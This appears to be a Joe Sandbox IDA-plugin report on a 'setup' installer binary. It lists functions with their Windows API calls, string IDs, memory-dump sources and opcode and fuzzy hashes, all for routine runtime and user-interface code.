                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                              • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                              • API String ID: 4190037839-3913318428
                                                                                                                                                                              • Opcode ID: bdbe0eba6a96933737b77f4b6a33b6aeab5a108e040166a2d2d0b6b7d094ce4e
                                                                                                                                                                              • Instruction ID: 46152b0189652b9ce2b97b76fb6270d0189884d116b7b441e7182326b50d6893
                                                                                                                                                                              • Opcode Fuzzy Hash: bdbe0eba6a96933737b77f4b6a33b6aeab5a108e040166a2d2d0b6b7d094ce4e
                                                                                                                                                                              • Instruction Fuzzy Hash: BDA15B70D04208DFDB24CF68C959B9EBBF4FF49304F20826DE455AB291DB74AA44CBA1
                                                                                                                                                                              Function 00BB1000 Relevance: 10.7, APIs: 7, Instructions: 204memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00BB10F4
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB1169
                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?), ref: 00BB11D9
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?), ref: 00BB11DF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,E5106CA8), ref: 00BB120C
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,E5106CA8), ref: 00BB1212
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB122A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$Heap$String$Process
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2680101141-0
                                                                                                                                                                              • Opcode ID: a3619e46d486705996b05b241b834f6a9bd8296bee0a55f51be1d6ccd7b04254
                                                                                                                                                                              • Instruction ID: 28887522562c4f1d8f4047930e1785b57de7a1e222eb5bac31a5d017fd6c25dc
                                                                                                                                                                              • Opcode Fuzzy Hash: a3619e46d486705996b05b241b834f6a9bd8296bee0a55f51be1d6ccd7b04254
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C813570D012599FDF10DFA8C954BEEBBF8EF05310F644999E510BB281D7B89A04CBA1
                                                                                                                                                                              Function 00BB9BD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C,E5106CA8,00000000,00EA69B8), ref: 00BB9C43
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9CA8
                                                                                                                                                                              • LoadCursorW.USER32(00BA0000,?), ref: 00BB9D04
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9D9B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                                                                                              • String ID: v$ATL:%p
                                                                                                                                                                              • API String ID: 2080323225-109518622
                                                                                                                                                                              • Opcode ID: ba1a1befe067dce455c1cd795d2c5ecda64cef95063d63a9be113e65ae98907a
                                                                                                                                                                              • Instruction ID: 2dbce08e59c4c7bf63173a76080c84b94452ffe40c5c9af82addf93aec82cf0e
                                                                                                                                                                              • Opcode Fuzzy Hash: ba1a1befe067dce455c1cd795d2c5ecda64cef95063d63a9be113e65ae98907a
                                                                                                                                                                              • Instruction Fuzzy Hash: C551BC71D00B44DFDB20CF69C9406AABBF0FF59320F04465EE995A3691E7B1B984CB90
                                                                                                                                                                              Function 00BBA130 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetLastError.KERNEL32(0000000E,E5106CA8,?,?,00000000,?), ref: 00BBA16E
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BBA1AF
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C), ref: 00BBA1CF
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BBA1F3
                                                                                                                                                                                • Part of subcall function 00D7F902: GetProcessHeap.KERNEL32(00000008,00000008,?,00BB83B7,?,?,00BB8164,?), ref: 00D7F907
                                                                                                                                                                                • Part of subcall function 00D7F902: HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F90E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalHeapSection$AllocCurrentEnterErrorLastLeaveProcessThread
                                                                                                                                                                              • String ID: v$AXWIN UI Window
                                                                                                                                                                              • API String ID: 2176831970-2690018532
                                                                                                                                                                              • Opcode ID: 926621ac5943f116de6fe0cef5eb505d47df0b18f25916eedb46637d19e05d30
                                                                                                                                                                              • Instruction ID: 85a2330f8fc84fe8f071a45121e54732a2bd6733231311ce1bbaffd3c28817a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 926621ac5943f116de6fe0cef5eb505d47df0b18f25916eedb46637d19e05d30
                                                                                                                                                                              • Instruction Fuzzy Hash: B151B571A00345EFDB10DF59DD05BAABBF4FB89B14F10825AF904B7290D7B2A814CBA1
                                                                                                                                                                              Function 00CAA450 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CAA4E0
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • GetProcAddress.KERNEL32(SetWindowTheme), ref: 00CAA51D
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CAA534
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                                • Part of subcall function 00C889F0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionDirectoryProcSystemVariableWake
                                                                                                                                                                              • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                                                                                              • API String ID: 2009665995-3123591815
                                                                                                                                                                              • Opcode ID: fb6f1d59c952b66f73c1d30b04ddbd902f95c09323b19647194b4c3313482f30
                                                                                                                                                                              • Instruction ID: 862a1961dee5bccd45f906ecf0298b351845c1b325880f2fa72a04d255f31977
                                                                                                                                                                              • Opcode Fuzzy Hash: fb6f1d59c952b66f73c1d30b04ddbd902f95c09323b19647194b4c3313482f30
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B21C172A41705EFCB20DF19ED06B59B760EB1BB30F144215E460B72D0DBB0BA08CB66
                                                                                                                                                                              Function 00D99953 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00D99A60,0000000D,00BB079C,00000001,00000000,0000000B,?,00D99CCA,00000021,FlsSetValue,00E10E8C,00E10E94,00000001), ref: 00D99A14
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                              • Opcode ID: dd2b4a1eea946f6a51f54682a2d209ef6df5cdc4b655fba6dcec302ecca82fc1
                                                                                                                                                                              • Instruction ID: ef2c0dd3f0ead0a7103a7dec309161b74bad36725dab0f7157c1890de3aead67
                                                                                                                                                                              • Opcode Fuzzy Hash: dd2b4a1eea946f6a51f54682a2d209ef6df5cdc4b655fba6dcec302ecca82fc1
                                                                                                                                                                              • Instruction Fuzzy Hash: AA21EB31A01210BFDF219B69DC91A5AB768EB927A0F28121DFD06B72D1D730ED44CAF0
                                                                                                                                                                              Function 00BB8CA0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 460stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcmpW.KERNEL32(?,#32770), ref: 00BB8DA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcmp
                                                                                                                                                                              • String ID: #32770
                                                                                                                                                                              • API String ID: 1534048567-463685578
                                                                                                                                                                              • Opcode ID: 31192e583f81ac4b3113649cf119fbc47fbdce3aab02bc89cdb7b1c6f8312c0d
                                                                                                                                                                              • Instruction ID: 525679a59eb0f45dfa9ff60e4ccb6cc84c641e034416607231bd42c5f5c8d526
                                                                                                                                                                              • Opcode Fuzzy Hash: 31192e583f81ac4b3113649cf119fbc47fbdce3aab02bc89cdb7b1c6f8312c0d
                                                                                                                                                                              • Instruction Fuzzy Hash: D2028E70A00209EFDB14DFA8C848BEEBBF9EF49314F144599F515E7290DBB59944CB60
                                                                                                                                                                              Function 00BDF330 Relevance: 9.2, APIs: 6, Instructions: 153COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF37A
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF39C
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF3C4
                                                                                                                                                                              • __Getctype.LIBCPMT ref: 00BDF4A5
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00BDF507
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF531
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1102183713-0
                                                                                                                                                                              • Opcode ID: b48a41114eddea5dee314203d6186ee55cad8e3ea6de540252ec97dba15fe73f
                                                                                                                                                                              • Instruction ID: 3dbd766872f2bf1ed5ec0e48003d6db5166e8a82deb08e558ec9e640d098862d
                                                                                                                                                                              • Opcode Fuzzy Hash: b48a41114eddea5dee314203d6186ee55cad8e3ea6de540252ec97dba15fe73f
                                                                                                                                                                              • Instruction Fuzzy Hash: 17619271D04249CFDB11DF58D9417AEFBF0EF14320F1482AAD845AB391E774AA84CBA1
                                                                                                                                                                              Function 00BDF130 Relevance: 9.1, APIs: 6, Instructions: 140COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF16D
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF18F
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF1B7
                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00BDF281
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00BDF2C6
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF2FE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1184649410-0
                                                                                                                                                                              • Opcode ID: a2ab833967fe509e2dc5a37205563086d816cc05547403cf05f929155b2b61e1
                                                                                                                                                                              • Instruction ID: bd193a6b6d8c4e7296ef6502dee4ac2722e66534b835cd4e6df04399ed423e16
                                                                                                                                                                              • Opcode Fuzzy Hash: a2ab833967fe509e2dc5a37205563086d816cc05547403cf05f929155b2b61e1
                                                                                                                                                                              • Instruction Fuzzy Hash: 2A518C71904249DFCB11DF98D880BADFBF0EF55314F2481AAE8167B381E7746A05CB90
                                                                                                                                                                              Function 00C7B930 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 342COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00C7BBD5
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00C7BCA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: AI_FRAME_NO_CAPTION_$Dialog$`Dialog` = '
                                                                                                                                                                              • API String ID: 1385522511-2270296660
                                                                                                                                                                              • Opcode ID: ba1d03a361bc8e9dfbfaef8e8d3477d13b3e799c98c62d7fa6c14195b2b3610e
                                                                                                                                                                              • Instruction ID: 206d3e957ae518ca5ff48ca689818f2de0b180a704d3c3b96841a3d746cf515e
                                                                                                                                                                              • Opcode Fuzzy Hash: ba1d03a361bc8e9dfbfaef8e8d3477d13b3e799c98c62d7fa6c14195b2b3610e
                                                                                                                                                                              • Instruction Fuzzy Hash: 71D1B271900208DFCB14DFB9DD85B9EB7B1EF5A310F148269E919BB291D770B948CBA0
                                                                                                                                                                              Function 00D819D3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00D819CA,00D81996,?,?,00BDC5ED,00CCA740,?,00000008), ref: 00D819E1
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D819EF
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D81A08
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00D819CA,00D81996,?,?,00BDC5ED,00CCA740,?,00000008), ref: 00D81A5A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                              • Opcode ID: eee8445bca367e69ea92bf0aef099b522f65af9529ccc6e8cff33350ffec0661
                                                                                                                                                                              • Instruction ID: 061865624cb0816fb5bfd02edc062a88bb41d2355ffe257a78036e50e524be0a
                                                                                                                                                                              • Opcode Fuzzy Hash: eee8445bca367e69ea92bf0aef099b522f65af9529ccc6e8cff33350ffec0661
                                                                                                                                                                              • Instruction Fuzzy Hash: 4401753620A2129E972837BAAC85B6B269CDB11779774032BF524751E0EF158C5B5370
                                                                                                                                                                              Function 00CCD460 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166synchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CCD5E7
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CCD603
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,00DEC257), ref: 00CCD614
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CCD622
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                                                                              • String ID: <
                                                                                                                                                                              • API String ID: 2321548817-4251816714
                                                                                                                                                                              • Opcode ID: 22cd5b13df965d9441a814324c0f79945c6076994f73a03babe4773f11d298ce
                                                                                                                                                                              • Instruction ID: 7a4664adff44436ecd280edf3a77af4b7cd417cd649dc9c9d44bd9831990049c
                                                                                                                                                                              • Opcode Fuzzy Hash: 22cd5b13df965d9441a814324c0f79945c6076994f73a03babe4773f11d298ce
                                                                                                                                                                              • Instruction Fuzzy Hash: D4616AB1D006499FDB10CFA9C844B9EBBB4FF49324F14826DE826AB391D7759E44CB90
